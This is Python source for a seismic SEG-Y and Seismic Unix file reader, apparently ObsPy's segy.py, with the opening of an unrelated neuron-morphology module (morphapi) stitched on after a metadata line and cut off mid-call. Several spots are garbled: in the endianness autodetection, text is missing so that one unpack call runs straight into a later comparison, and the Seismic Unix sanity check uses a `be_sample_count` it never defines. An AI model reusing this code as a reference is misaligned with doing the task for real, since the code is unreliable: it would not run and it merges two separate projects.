attempting to unpack trace data but no ``unpack_data()`` function\n exists.\n \"\"\"\n pass\n\n\nclass SEGYWritingError(SEGYError):\n \"\"\"\n Raised 
if the trace header is not the required 240 byte long.\n \"\"\"\n pass\n\n\nclass SEGYWarning(UserWarning):\n \"\"\"\n SEG Y warnings base class.\n \"\"\"\n pass\n\n\nclass SEGYInvalidTextualHeaderWarning(SEGYWarning):\n \"\"\"\n Warning that is raised if an invalid textual header is about to be written.\n \"\"\"\n pass\n\n\nclass SEGYFile(object):\n \"\"\"\n Class that internally handles SEG Y files.\n \"\"\"\n def __init__(self, file=None, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False, read_traces=True):\n \"\"\"\n Class that internally handles SEG Y files.\n\n :param file: A file like object with the file pointer set at the\n beginning of the SEG Y file. If file is None, an empty SEGYFile\n object will be initialized.\n :param endian: The endianness of the file. If None, autodetection will\n be used.\n :param textual_header_encoding: The encoding of the textual header.\n Either 'EBCDIC', 'ASCII' or None. If it is None, autodetection will\n be attempted. If it is None and file is also None, it will default\n to 'ASCII'.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory\n usage and the performance. They can be unpacked on-the-fly after\n being read. Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records\n will be read and unpacked. Has a huge impact on memory usage. Data\n will not be unpackable on-the-fly. Defaults to False.\n :type read_traces: bool\n :param read_traces: Data traces will only be read if this is set to\n ``True``. The data will be completely ignored if this is set to\n ``False``.\n \"\"\"\n if file is None:\n self._create_empty_segy_file_object()\n # Set the endianness to big.\n if endian is None:\n self.endian = '>'\n else:\n self.endian = ENDIAN[endian]\n # And the textual header encoding to ASCII.\n if textual_header_encoding is None:\n self.textual_header_encoding = 'ASCII'\n self.textual_header = b''\n return\n self.file = file\n # If endian is None autodetect is.\n if not endian:\n self._autodetect_endianness()\n else:\n self.endian = ENDIAN[endian]\n # If the textual header encoding is None, autodetection will be used.\n self.textual_header_encoding = textual_header_encoding\n # Read the headers.\n self._read_headers()\n # Read the actual traces.\n if read_traces:\n [i for i in self._read_traces(\n unpack_headers=unpack_headers, headonly=headonly)]\n\n def __str__(self):\n \"\"\"\n Prints some information about the SEG Y file.\n \"\"\"\n return '%i traces in the SEG Y structure.' % len(self.traces)\n\n def _repr_pretty_(self, p, cycle):\n p.text(str(self))\n\n def _autodetect_endianness(self):\n \"\"\"\n Tries to automatically determine the endianness of the file at hand.\n \"\"\"\n pos = self.file.tell()\n # Jump to the data sample format code.\n self.file.seek(3224, 1)\n format = unpack(b'>h', self.file.read(2))[0]\n # Check if valid.\n if format in DATA_SAMPLE_FORMAT_UNPACK_FUNCTIONS.keys():\n self.endian = '>'\n # Else test little endian.\n else:\n self.file.seek(-2, 1)\n format = unpack(b' data_left:\n msg = \"\"\"\n Too little data left in the file to unpack it according to\n its trace header. 
This is most likely either due to a wrong\n byte order or a corrupt file.\n \"\"\".strip()\n raise SEGYTraceReadingError(msg)\n if headonly:\n # skip reading the data, but still advance the file\n self.file.seek(data_needed, 1)\n # build a function for reading data from the disk on the fly\n self.unpack_data = OnTheFlyDataUnpacker(\n DATA_SAMPLE_FORMAT_UNPACK_FUNCTIONS[self.data_encoding],\n self.file.name, self.file.mode, pos, npts, endian=self.endian)\n else:\n # Unpack the data.\n self.data = DATA_SAMPLE_FORMAT_UNPACK_FUNCTIONS[\n self.data_encoding](self.file, npts, endian=self.endian)\n\n def write(self, file, data_encoding=None, endian=None):\n \"\"\"\n Writes the Trace to a file like object.\n\n If endian or data_encoding is set, these values will be enforced.\n Otherwise use the values of the SEGYTrace object.\n \"\"\"\n # Set the data length in the header before writing it.\n self.header.number_of_samples_in_this_trace = len(self.data)\n\n # Write the header.\n self.header.write(file, endian=endian)\n if data_encoding is None:\n data_encoding = self.data_encoding\n if endian is None:\n endian = self.endian\n # Write the data.\n if self.data is None:\n msg = \"No data in the SEGYTrace.\"\n raise SEGYWritingError(msg)\n DATA_SAMPLE_FORMAT_PACK_FUNCTIONS[data_encoding](file, self.data,\n endian=endian)\n\n def _create_empty_trace(self):\n \"\"\"\n Creates an empty trace with an empty header.\n \"\"\"\n self.data = np.zeros(0, dtype=np.float32)\n self.header = SEGYTraceHeader(header=None, endian=self.endian)\n\n def __str__(self):\n \"\"\"\n Print some information about the trace.\n \"\"\"\n ret_val = 'Trace sequence number within line: %i\\n' % \\\n self.header.trace_sequence_number_within_line\n ret_val += '%i samples, dtype=%s, %.2f Hz' % (\n len(self.data),\n self.data.dtype, 1.0 /\n (self.header.sample_interval_in_ms_for_this_trace /\n float(1E6)))\n return ret_val\n\n def _repr_pretty_(self, p, cycle):\n p.text(str(self))\n\n def __getattr__(self, name):\n \"\"\"\n This method is only called if the attribute is not found in the usual\n places (i.e. 
not an instance attribute or not found in the class tree\n for self).\n \"\"\"\n if name == 'data':\n # Use data unpack function to unpack data on the fly\n if hasattr(self, 'unpack_data'):\n return self.unpack_data()\n else:\n msg = \"\"\"\n Attempted to unpack trace data on the fly with\n self.unpack_data(), but function does not exist.\n \"\"\".strip()\n raise SEGYTraceOnTheFlyDataUnpackingError(msg)\n else:\n msg = \"'%s' object has no attribute '%s'\" % \\\n (self.__class__.__name__, name)\n raise AttributeError(msg)\n\n def to_obspy_trace(self, unpack_trace_headers=False, headonly=False):\n \"\"\"\n Convert the current Trace to an ObsPy Trace object.\n\n :param unpack_trace_headers:\n \"\"\"\n # Import here to avoid circular imports.\n from .core import LazyTraceHeaderAttribDict # NOQA\n\n # Create new Trace object for every segy trace and append to the Stream\n # object.\n trace = Trace()\n # skip data if headonly is set\n if headonly:\n trace.stats.npts = self.npts\n else:\n trace.data = self.data\n trace.stats.segy = AttribDict()\n # If all values will be unpacked create a normal dictionary.\n if unpack_trace_headers:\n # Add the trace header as a new attrib dictionary.\n header = AttribDict()\n for key, value in self.header.__dict__.items():\n setattr(header, key, value)\n # Otherwise use the LazyTraceHeaderAttribDict.\n else:\n # Add the trace header as a new lazy attrib dictionary.\n header = LazyTraceHeaderAttribDict(self.header.unpacked_header,\n self.header.endian)\n trace.stats.segy.trace_header = header\n # The sampling rate should be set for every trace. It is a sample\n # interval in microseconds. The only sanity check is that is should be\n # larger than 0.\n tr_header = trace.stats.segy.trace_header\n if tr_header.sample_interval_in_ms_for_this_trace > 0:\n trace.stats.delta = \\\n float(self.header.sample_interval_in_ms_for_this_trace) / \\\n 1E6\n # If the year is not zero, calculate the start time. The end time is\n # then calculated from the start time and the sampling rate.\n if tr_header.year_data_recorded > 0:\n year = tr_header.year_data_recorded\n # The SEG Y rev 0 standard specifies the year to be a 4 digit\n # number. Before that it was unclear if it should be a 2 or 4\n # digit number. Old or wrong software might still write 2 digit\n # years. Every number <30 will be mapped to 2000-2029 and every\n # number between 30 and 99 will be mapped to 1930-1999.\n if year < 100:\n if year < 30:\n year += 2000\n else:\n year += 1900\n julday = tr_header.day_of_year\n hour = tr_header.hour_of_day\n minute = tr_header.minute_of_hour\n second = tr_header.second_of_minute\n # work around some strange SEGY files that don't store proper\n # start date/time but only a year (see #1722)\n if julday == 0 and hour == 0 and minute == 0 and second == 0:\n msg = ('Trace starttime does not store a proper date (day '\n 'of year is zero). 
Using January 1st 00:00 as '\n 'trace start time.')\n warnings.warn(msg)\n julday = 1\n trace.stats.starttime = UTCDateTime(\n year=year, julday=julday, hour=hour, minute=minute,\n second=second)\n return trace\n\n\nclass SEGYTraceHeader(object):\n \"\"\"\n Convenience class that handles reading and writing of the trace headers.\n \"\"\"\n def __init__(self, header=None, endian='>', unpack_headers=False):\n \"\"\"\n Will take the 240 byte of the trace header and unpack all values with\n the given endianness.\n\n :type header: str\n :param header: String that contains the packed binary header values.\n If header is None, a trace header with all values set to 0 will be\n created\n :type big_endian: bool\n :param big_endian: True means the header is encoded in big endian and\n False corresponds to a little endian header.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory\n usage and the performance. They can be unpacked on-the-fly after\n being read. Defaults to False.\n \"\"\"\n self.endian = endian\n if header is None:\n self._create_empty_trace_header()\n return\n # Check the length of the string,\n if len(header) != 240:\n msg = 'The trace header needs to be 240 bytes long'\n raise SEGYTraceHeaderTooSmallError(msg)\n # Either unpack the header or just append the unpacked header. This is\n # much faster and can later be unpacked on the fly.\n if not unpack_headers:\n self.unpacked_header = header\n else:\n self.unpacked_header = None\n self._read_trace_header(header)\n\n def _read_trace_header(self, header):\n \"\"\"\n Reads the 240 byte long header and unpacks all values into\n corresponding class attributes.\n \"\"\"\n # Set the start position.\n pos = 0\n # Loop over all items in the TRACE_HEADER_FORMAT list which is supposed\n # to be in the correct order.\n for item in TRACE_HEADER_FORMAT:\n length, name, special_format, _ = item\n string = header[pos: pos + length]\n pos += length\n setattr(self, name, unpack_header_value(self.endian, string,\n length, special_format))\n\n def write(self, file, endian=None):\n \"\"\"\n Writes the header to an open file like object.\n \"\"\"\n if endian is None:\n endian = self.endian\n for item in TRACE_HEADER_FORMAT:\n length, name, special_format, _ = item\n # Use special format if necessary.\n if special_format:\n format = ('%s%s' % (endian,\n special_format)).encode('ascii',\n 'strict')\n file.write(pack(format, getattr(self, name)))\n # Pack according to different lengths.\n elif length == 2:\n format = ('%sh' % endian).encode('ascii', 'strict')\n file.write(pack(format, getattr(self, name)))\n # Update: Seems to be correct. Two's complement integers seem to be\n # the common way to store integer values.\n elif length == 4:\n format = ('%si' % endian).encode('ascii', 'strict')\n file.write(pack(format, getattr(self, name)))\n # Just the one unassigned field.\n elif length == 8:\n field = getattr(self, name)\n # An empty field will have a zero.\n if field == 0:\n field = 2 * pack(('%si' % endian).encode('ascii',\n 'strict'), 0)\n file.write(field)\n # Should not happen.\n else:\n raise Exception\n\n def __getattr__(self, name):\n \"\"\"\n This method is only called if the attribute is not found in the usual\n places (i.e. 
not an instance attribute or not found in the class tree\n for self).\n \"\"\"\n try:\n index = TRACE_HEADER_KEYS.index(name)\n # If not found raise an attribute error.\n except ValueError:\n msg = \"'%s' object has no attribute '%s'\" % \\\n (self.__class__.__name__, name)\n raise AttributeError(msg)\n # Unpack the one value and set the class attribute so it will does not\n # have to unpacked again if accessed in the future.\n length, name, special_format, start = TRACE_HEADER_FORMAT[index]\n string = self.unpacked_header[start: start + length]\n attribute = unpack_header_value(self.endian, string, length,\n special_format)\n setattr(self, name, attribute)\n return attribute\n\n def __str__(self):\n \"\"\"\n Just returns all header values.\n \"\"\"\n retval = ''\n for _, name, _, _ in TRACE_HEADER_FORMAT:\n # Do not print the unassigned value.\n if name == 'unassigned':\n continue\n retval += '%s: %i\\n' % (name, getattr(self, name))\n return retval\n\n def _repr_pretty_(self, p, cycle):\n p.text(str(self))\n\n def _create_empty_trace_header(self):\n \"\"\"\n Init the trace header with zeros.\n \"\"\"\n # First set all fields to zero.\n for field in TRACE_HEADER_FORMAT:\n setattr(self, field[1], 0)\n\n\ndef _read_segy(file, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False):\n \"\"\"\n Reads a SEG Y file and returns a SEGYFile object.\n\n :param file: Open file like object or a string which will be assumed to be\n a filename.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :param textual_header_encoding: The encoding of the textual header.\n Either 'EBCDIC', 'ASCII' or None. If it is None, autodetection will\n be attempted.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n read and unpacked. Has a huge impact on memory usage. Data will not be\n unpackable on-the-fly after reading the file. Defaults to False.\n \"\"\"\n # Open the file if it is not a file like object.\n if not hasattr(file, 'read') or not hasattr(file, 'tell') or not \\\n hasattr(file, 'seek'):\n with open(file, 'rb') as open_file:\n return _internal_read_segy(\n open_file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly)\n # Otherwise just read it.\n return _internal_read_segy(file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers,\n headonly=headonly)\n\n\ndef _internal_read_segy(file, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False):\n \"\"\"\n Reads on open file object and returns a SEGYFile object.\n\n :param file: Open file like object.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :param textual_header_encoding: The encoding of the textual header.\n Either 'EBCDIC', 'ASCII' or None. 
If it is None, autodetection will\n be attempted.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n read and unpacked. Has a huge impact on memory usage. Data will not be\n unpackable on-the-fly after reading the file. Defaults to False.\n \"\"\"\n return SEGYFile(file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly)\n\n\ndef iread_segy(file, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False):\n \"\"\"\n Iteratively read a SEG-Y field and yield single ObsPy Traces.\n\n The function iteratively loops over the whole file and yields single\n ObsPy Traces. The next Trace will be read after the current loop has\n finished - this function is thus suitable for reading arbitrarily large\n SEG-Y files without running into memory problems.\n\n >>> from obspy.core.util import get_example_file\n >>> filename = get_example_file(\"00001034.sgy_first_trace\")\n >>> from obspy.io.segy.segy import iread_segy\n >>> for tr in iread_segy(filename):\n ... # Each Trace's stats attribute will have references to the file\n ... # headers and some more information.\n ... tf = tr.stats.segy.textual_file_header\n ... bf = tr.stats.segy.binary_file_header\n ... tfe = tr.stats.segy.textual_file_header_encoding\n ... de = tr.stats.segy.data_encoding\n ... e = tr.stats.segy.endian\n ... # Also do something meaningful with each Trace.\n ... print(int(tr.data.sum() * 1E9))\n -5\n\n :param file: Open file like object or a string which will be assumed to be\n a filename.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :param textual_header_encoding: The encoding of the textual header.\n Either 'EBCDIC', 'ASCII' or None. If it is None, autodetection will\n be attempted.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n read and unpacked. Has a huge impact on memory usage. Data will not be\n unpackable on-the-fly after reading the file. 
Defaults to False.\n \"\"\"\n # Open the file if it is not a file like object.\n if not hasattr(file, 'read') or not hasattr(file, 'tell') or not \\\n hasattr(file, 'seek'):\n with open(file, 'rb') as open_file:\n for tr in _internal_iread_segy(\n open_file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly):\n yield tr\n return\n # Otherwise just read it.\n for tr in _internal_iread_segy(\n file, endian=endian,\n textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly):\n yield tr\n\n\ndef _internal_iread_segy(file, endian=None, textual_header_encoding=None,\n unpack_headers=False, headonly=False):\n \"\"\"\n Iteratively read a SEG-Y field and yield single ObsPy Traces.\n \"\"\"\n segy_file = SEGYFile(\n file, endian=endian, textual_header_encoding=textual_header_encoding,\n unpack_headers=unpack_headers, headonly=headonly, read_traces=False)\n for trace in segy_file._read_traces(unpack_headers=unpack_headers,\n headonly=headonly,\n yield_each_trace=True):\n tr = trace.to_obspy_trace(unpack_trace_headers=unpack_headers,\n headonly=headonly)\n # Fill stats that are normally attached to the stream stats.\n tr.stats.segy.textual_file_header = segy_file.textual_file_header\n tr.stats.segy.binary_file_header = segy_file.binary_file_header\n tr.stats.segy.textual_file_header_encoding = \\\n segy_file.textual_header_encoding.upper()\n tr.stats.segy.data_encoding = trace.data_encoding\n tr.stats.segy.endian = trace.endian\n tr.stats._format = \"SEGY\"\n yield tr\n\n\ndef iread_su(file, endian=None, unpack_headers=False, headonly=False):\n \"\"\"\n Iteratively read a SU field and yield single ObsPy Traces.\n\n The function iteratively loops over the whole file and yields single\n ObsPy Traces. The next Trace will be read after the current loop has\n finished - this function is thus suitable for reading arbitrarily large\n SU files without running into memory problems.\n\n >>> from obspy.core.util import get_example_file\n >>> filename = get_example_file(\"1.su_first_trace\")\n >>> from obspy.io.segy.segy import iread_su\n >>> for tr in iread_su(filename):\n ... # Each Trace's stats attribute will have some file-wide\n ... # information.\n ... de = tr.stats.su.data_encoding\n ... e = tr.stats.su.endian\n ... # Also do something meaningful with each Trace.\n ... print(int(tr.data.sum()))\n -26121\n\n :param file: Open file like object or a string which will be assumed to be\n a filename.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :type unpack_headers: bool\n :param unpack_headers: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n read and unpacked. Has a huge impact on memory usage. Data will not be\n unpackable on-the-fly after reading the file. 
Defaults to False.\n \"\"\"\n # Open the file if it is not a file like object.\n if not hasattr(file, 'read') or not hasattr(file, 'tell') or not \\\n hasattr(file, 'seek'):\n with open(file, 'rb') as open_file:\n for tr in _internal_iread_su(\n open_file, endian=endian,\n unpack_headers=unpack_headers, headonly=headonly):\n yield tr\n return\n # Otherwise just read it.\n for tr in _internal_iread_su(\n file, endian=endian,\n unpack_headers=unpack_headers, headonly=headonly):\n yield tr\n\n\ndef _internal_iread_su(file, endian=None, unpack_headers=False,\n headonly=False):\n \"\"\"\n Iteratively read a SU field and yield single ObsPy Traces.\n \"\"\"\n su_file = SUFile(\n file, endian=endian, unpack_headers=unpack_headers, headonly=headonly,\n read_traces=False)\n for trace in su_file._read_traces(unpack_headers=unpack_headers,\n headonly=headonly,\n yield_each_trace=True):\n tr = trace.to_obspy_trace(unpack_trace_headers=unpack_headers,\n headonly=headonly)\n tr.stats.su = tr.stats.segy\n del tr.stats.segy\n # Fill stats that are normally attached to the stream stats.\n tr.stats.su.data_encoding = trace.data_encoding\n tr.stats.su.endian = trace.endian\n tr.stats._format = \"SU\"\n yield tr\n\n\nclass SUFile(object):\n \"\"\"\n Convenience class that internally handles Seismic Unix data files. It\n currently can only read IEEE 4 byte float encoded SU data files.\n \"\"\"\n def __init__(self, file=None, endian=None, unpack_headers=False,\n headonly=False, read_traces=True):\n \"\"\"\n :param file: A file like object with the file pointer set at the\n beginning of the SEG Y file. If file is None, an empty SEGYFile\n object will be initialized.\n\n :param endian: The endianness of the file. If None, autodetection will\n be used.\n :type unpack_header: bool\n :param unpack_header: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory\n usage and the performance. They can be unpacked on-the-fly after\n being read. Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records\n will be read and unpacked. Has a huge impact on memory usage. Data\n will not be unpackable on-the-fly after reading the file.\n Defaults to False.\n :type read_traces: bool\n :param read_traces: Data traces will only be read if this is set to\n ``True``. The data will be completely ignored if this is set to\n ``False``.\n \"\"\"\n if file is None:\n self._create_empty_su_file_object()\n return\n # Set the endianness to big.\n if endian is None:\n self.endian = '>'\n else:\n self.endian = ENDIAN[endian]\n return\n self.file = file\n # If endian is None autodetect is.\n if not endian:\n self._autodetect_endianness()\n else:\n self.endian = ENDIAN[endian]\n if read_traces:\n # Read the actual traces.\n [i for i in self._read_traces(unpack_headers=unpack_headers,\n headonly=headonly)]\n\n def _autodetect_endianness(self):\n \"\"\"\n Tries to automatically determine the endianness of the file at hand.\n \"\"\"\n self.endian = autodetect_endian_and_sanity_check_su(self.file)\n if self.endian is False:\n msg = 'Autodetection of Endianness failed. Please specify it ' + \\\n 'by hand or contact the developers.'\n raise Exception(msg)\n\n def _create_empty_su_file_object(self):\n \"\"\"\n Creates an empty SUFile object.\n \"\"\"\n self.traces = []\n\n def __str__(self):\n \"\"\"\n Prints some information about the SU file.\n \"\"\"\n return '%i traces in the SU structure.' 
% len(self.traces)\n\n def _repr_pretty_(self, p, cycle):\n p.text(str(self))\n\n def _read_traces(self, unpack_headers=False, headonly=False,\n yield_each_trace=False):\n \"\"\"\n Reads the actual traces starting at the current file pointer position\n to the end of the file.\n\n :type unpack_header: bool\n :param unpack_header: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory\n usage and the performance. They can be unpacked on-the-fly after\n being read. Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records\n will be unpacked. Useful if one is just interested in the headers.\n Data will not be unpackable on-the-fly after reading the file.\n Defaults to False.\n :type yield_each_trace: bool\n :param yield_each_trace: If True, it will yield each trace after it\n has been read. This enables a simple implementation of a\n streaming interface to read SEG-Y files. Read traces will no\n longer be collected in ``self.traces`` list if this is set to\n ``True``.\n \"\"\"\n self.traces = []\n # Big loop to read all data traces.\n while True:\n # Read and as soon as the trace header is too small abort.\n try:\n # Always unpack with IEEE\n trace = SEGYTrace(self.file, 5, self.endian,\n unpack_headers=unpack_headers,\n headonly=headonly)\n if yield_each_trace:\n yield trace\n else:\n self.traces.append(trace)\n except SEGYTraceHeaderTooSmallError:\n break\n\n def write(self, file, endian=None):\n \"\"\"\n Write a SU Y file to file which is either a file like object with a\n write method or a filename string.\n\n If endian is set it will be enforced.\n \"\"\"\n if not hasattr(file, 'write'):\n with open(file, 'wb') as file:\n self._write(file, endian=endian)\n return\n self._write(file, endian=endian)\n\n def _write(self, file, endian=None):\n \"\"\"\n Write a SU Y file to file which is either a file like object with a\n write method or a filename string.\n\n If endian is set it will be enforced.\n \"\"\"\n # Write all traces.\n for trace in self.traces:\n trace.write(file, data_encoding=5, endian=endian)\n\n\ndef _read_su(file, endian=None, unpack_headers=False, headonly=False):\n \"\"\"\n Reads a Seismic Unix (SU) file and returns a SUFile object.\n\n :param file: Open file like object or a string which will be assumed to be\n a filename.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :type unpack_header: bool\n :param unpack_header: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n unpacked. Useful if one is just interested in the headers. 
Defaults to\n False.\n \"\"\"\n # Open the file if it is not a file like object.\n if not hasattr(file, 'read') or not hasattr(file, 'tell') or not \\\n hasattr(file, 'seek'):\n with open(file, 'rb') as open_file:\n return _internal_read_su(open_file, endian=endian,\n unpack_headers=unpack_headers,\n headonly=headonly)\n # Otherwise just read it.\n return _internal_read_su(file, endian=endian,\n unpack_headers=unpack_headers, headonly=headonly)\n\n\ndef _internal_read_su(file, endian=None, unpack_headers=False, headonly=False):\n \"\"\"\n Reads on open file object and returns a SUFile object.\n\n :param file: Open file like object.\n :type endian: str\n :param endian: String that determines the endianness of the file. Either\n '>' for big endian or '<' for little endian. If it is None,\n obspy.io.segy will try to autodetect the endianness. The endianness\n is always valid for the whole file.\n :type unpack_header: bool\n :param unpack_header: Determines whether or not all headers will be\n unpacked during reading the file. Has a huge impact on the memory usage\n and the performance. They can be unpacked on-the-fly after being read.\n Defaults to False.\n :type headonly: bool\n :param headonly: Determines whether or not the actual data records will be\n unpacked. Useful if one is just interested in the headers. Defaults to\n False.\n \"\"\"\n return SUFile(file, endian=endian, unpack_headers=unpack_headers,\n headonly=headonly)\n\n\ndef autodetect_endian_and_sanity_check_su(file):\n \"\"\"\n Takes an open file and tries to determine the endianness of a Seismic\n Unix data file by doing some sanity checks with the unpacked header values.\n\n Returns False if the sanity checks failed and the endianness otherwise.\n\n It is assumed that the data is written as 32bit IEEE floating points in\n either little or big endian.\n\n The test currently can only identify SU files in which all traces have the\n same length. 
It basically just makes a sanity check for various fields in\n the Trace header.\n \"\"\"\n pos = file.tell()\n if isinstance(file, io.BytesIO):\n file.seek(0, 2)\n size = file.tell()\n file.seek(pos, 0)\n else:\n size = os.fstat(file.fileno())[6]\n if size < 244:\n return False\n # Also has to be a multiple of 4 in length because every header is 400 long\n # and every data value 4 byte long.\n elif (size % 4) != 0:\n return False\n # Jump to the number of samples field in the trace header.\n file.seek(114, 0)\n sample_count = file.read(2)\n interval = file.read(2)\n # Jump to the beginning of the year fields.\n file.seek(156, 0)\n year = file.read(2)\n jul_day = file.read(2)\n hour = file.read(2)\n minute = file.read(2)\n second = file.read(2)\n # Jump to previous position.\n file.seek(pos, 0)\n # Unpack in little and big endian.\n le_sample_count = unpack(b'h', sample_count)[0]\n # Check if both work.\n working_byteorders = []\n if le_sample_count > 0:\n length = 240 + (le_sample_count * 4)\n if (size % length) == 0:\n working_byteorders.append('<')\n if be_sample_count > 0:\n length = 240 + (be_sample_count * 4)\n if (size % length) == 0:\n working_byteorders.append('>')\n # If None works return False.\n if len(working_byteorders) == 0:\n return False\n # Check if the other header values make sense.\n still_working_byteorders = []\n for bo in working_byteorders:\n fmt = (\"%sh\" % bo).encode('ascii', 'strict')\n this_interval = unpack(fmt, interval)[0]\n this_year = unpack(fmt, year)[0]\n this_julday = unpack(fmt, jul_day)[0]\n this_hour = unpack(fmt, hour)[0]\n this_minute = unpack(fmt, minute)[0]\n this_second = unpack(fmt, second)[0]\n # Make a sanity check for each.\n # XXX: The arbitrary maximum of the sample interval is 10 seconds.\n if this_interval <= 0 or this_interval > 10E7:\n continue\n # Some programs write two digit years.\n if this_year != 0 and (this_year < 1930 or this_year >= 2030) and \\\n (this_year < 0 or this_year >= 100):\n continue\n # 9999 is often used as a placeholder\n if (this_julday > 366 or this_julday < 0) and this_julday != 9999:\n continue\n if this_hour > 24 or this_hour < 0:\n continue\n if this_minute > 60 or this_minute < 0:\n continue\n if this_second > 60 or this_second < 0:\n continue\n still_working_byteorders.append(bo)\n length = len(still_working_byteorders)\n if not length:\n return False\n elif length == 1:\n return still_working_byteorders[0]\n else:\n # XXX: In the unlikely case both byte orders pass the sanity checks\n # something else should be checked. Currently it is not.\n msg = \"\"\"\n Both possible byte orders passed all sanity checks. 
Please contact\n the ObsPy developers so they can implement additional tests.\n \"\"\".strip()\n raise Exception(msg)\n","repo_name":"obspy/obspy","sub_path":"obspy/io/segy/segy.py","file_name":"segy.py","file_ext":"py","file_size_in_byte":59800,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"92"} +{"seq_id":"70863503661","text":"import logging\nfrom collections import namedtuple\nfrom pathlib import Path\n\nimport neurom as nm\nfrom neurom.core.dataformat import COLS\nfrom vedo import merge\nfrom vedo.colors import colorMap\nfrom vedo.shapes import Sphere\nfrom vedo.shapes import Tube\n\ntry:\n # For NeuroM >= 3\n from neurom.core.morphology import iter_sections\nexcept ImportError:\n # For NeuroM < 2\n try:\n from neurom.core import iter_sections\n except ImportError:\n # For NeuroM >= 2, < 3\n from neurom import iter_sections\n\nfrom morphapi.morphology.cache import NeuronCache\n\nlogger = logging.getLogger(__name__)\n\ncomponent = namedtuple(\"component\", \"x y z coords radius component\")\n\n\nclass Neuron(NeuronCache):\n _neurite_types = {\n \"basal_dendrites\": nm.core.types.NeuriteType.basal_dendrite,\n \"apical_dendrites\": nm.core.types.NeuriteType.apical_dendrite,\n \"axon\": nm.core.types.NeuriteType.axon,\n }\n\n _ntypes = nm.core.types.NEURITES\n\n def __init__(\n self,\n data_file,\n neuron_name=None,\n invert_dims=False,\n load_file=True,\n **kwargs,\n ):\n super().__init__(**kwargs) # path to data caches\n\n self.invert_dims = invert_dims\n self.neuron_name = neuron_name\n\n self.data_file = Path(data_file)\n self.data_file_type = self.data_file.suffix[1:]\n\n if self.data_file_type not in [\"swc\", \"json\"]:\n raise ValueError(\"Invalid data file type, should be swc or jon\")\n\n if self.neuron_name is None:\n self.neuron_name = self.data_file.name\n\n if load_file:\n self.load_from_file()\n else:\n self.points = None\n\n def load_from_file(self):\n if not self.data_file.exists():\n raise ValueError(\"The specified path does not exist!\")\n\n if self.data_file_type is None:\n return\n elif self.data_file_type == \"json\":\n raise NotImplementedError\n else:\n self.load_from_swc()\n\n def repair_swc_file(self):\n \"\"\"\n Fixes this: https://github.com/BlueBrain/NeuroM/issues/835\n \"\"\"\n with open(self.data_file, \"r\") as read:\n content = read.readlines()\n\n clean = []\n for line in content:\n if not len(line):\n clean.append(line)\n continue\n\n line = line.replace(\"\\n\", \"\").replace(\"\\t\", \" \")\n vals = line.split(\" \")\n if len(vals) < 2:\n clean.append(line)\n continue\n\n if vals[1] != \"1\" and vals[-1] == \"-1\":\n vals[-1] = \"0\"\n clean.append(\" \".join(vals))\n else:\n clean.append(line)\n\n if len(clean) != len(content):\n raise ValueError\n\n with open(self.data_file, \"w\") as write:\n for line in clean:\n write.write(f\"{line}\\n\")\n\n def load_from_swc(self):\n if self.neuron_name is None:\n self.neuron_name = self.data_file.name\n\n self.repair_swc_file()\n\n nrn = nm.load_morphology(self.data_file)\n\n # Get position and radius of some\n soma_pos = nrn.soma.points[0, :3]\n soma_radius = nrn.soma.points[0, -1]\n\n # Get the rest of the data and store it\n self.morphology = nrn\n self.points = dict(\n soma=component(\n soma_pos[0],\n soma_pos[1],\n soma_pos[2],\n 